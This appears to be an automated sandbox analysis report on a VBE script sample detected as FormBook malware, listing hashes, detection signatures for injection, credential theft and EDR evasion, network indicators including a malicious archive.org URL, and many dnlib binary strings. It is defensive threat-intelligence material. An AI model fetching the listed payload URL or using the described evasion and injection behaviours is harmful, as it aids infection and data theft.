Windows Analysis Report
10092024150836 09.10.2024.vbe

Overview

General Information

Sample name: 10092024150836 09.10.2024.vbe
Analysis ID: 1530632
MD5: 17cd7d0a0b68a5c484a848750820837a
SHA1: bff3178427c48734726b5e144c86d0833cd8cc1f
SHA256: 5d14ce5f262c2b1f20ed43231cd1ba696a1eac262da9e20d1415045e1a985eea
Tags: vbeuser-abuse_ch
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg Virustotal: Detection: 8% Perma Link
Multi AV Scanner detection for submitted file
Source: 10092024150836 09.10.2024.vbe Virustotal: Detection: 7% Perma Link
Yara detected FormBook
Source: Yara match File source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: unknown HTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdb source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QEwzeZKCXN.exe, 0000000A.00000002.3409362566.000000000013E000.00000002.00000001.01000000.00000006.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808153383.000000000013E000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
